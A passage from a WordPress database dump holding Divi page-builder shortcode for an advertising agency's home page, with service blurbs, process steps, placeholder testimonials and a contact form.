custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|1px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|-5px|56px|21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" custom_padding=\"|0px||||\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 21:30:11','2020-07-08 21:30:11','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(289,1,'2020-07-09 10:14:54','2020-07-09 10:14:54','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we 